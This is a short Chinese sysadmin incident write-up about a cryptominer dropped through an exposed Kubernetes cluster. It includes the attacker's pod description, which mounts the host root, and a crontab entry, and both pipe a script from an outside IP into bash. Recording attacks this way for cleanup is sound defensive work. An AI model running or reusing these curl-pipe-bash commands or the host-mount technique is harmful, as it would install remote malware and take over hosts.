发现服务器CPU占用100%,通过top命令发现pubg -c config.json -t 2占用CPU资源,kill进程会自动启动。黑客入侵方式是kubernetes创建pod。
Name: kube-api-zbplw
Namespace: default
Node: 120.79.2.25/120.79.2.25
Start Time: Tue, Dec :: +
Labels: <none>
Status: Succeeded
IP: 172.17.36.4
Controllers: <none>
Containers:
centos:
Container ID: docker://c293e7063e2f9c38939d24f707cb752a0b76def937b3f30d784fe8202d14b01d
Image: centos
Image ID: docker-pullable://docker.io/centos@sha256:3b1a65e9a05f0a77b5e8a698d3359459904c2a354dc3b25ae2e2f5c95f0b3667
Port:
Command:
/bin/sh
-c
/usr/bin/curl -s http://35.194.156.203/obi.sh | bash -s;sleep 120;cat /mnt/etc/crontab;echo 0
State: Terminated
Reason: Completed
Exit Code:
Started: Wed, Dec :: +
Finished: Wed, Dec :: +
Ready: False
Restart Count:
Volume Mounts:
/mnt from hahaha-volume (rw)
Environment Variables: <none>
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
hahaha-volume:
Type: HostPath (bare host directory volume)
Path: /
QoS Class: BestEffort
Tolerations: <none>
Events:
FirstSeen LastSeen Count From SubObjectPath Type Reason Message
--------- -------- ----- ---- ------------- -------- ------ -------
1d 24m {kubelet 120.79.2.25} Warning FailedSync Error syncing pod, skipping: failed to "StartContainer" for "POD" with ErrImagePull: "image pull failed for registry.access.redhat.com/rhel7/pod-infrastructure:latest, this may be because there are no credentials on this request. details: (open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory)"
解决方法
1,删除pod
kubectl delete pod kube-api-zbplw
2,修改crontab配置。
cat /etc/crontab
* * * * * root /usr/bin/curl -s http://35.194.156.203/steam.sh | /bin/bash -s
3,关闭crontab,清除crontab配置,再kill pubg进程,问题解决。
service crond stop
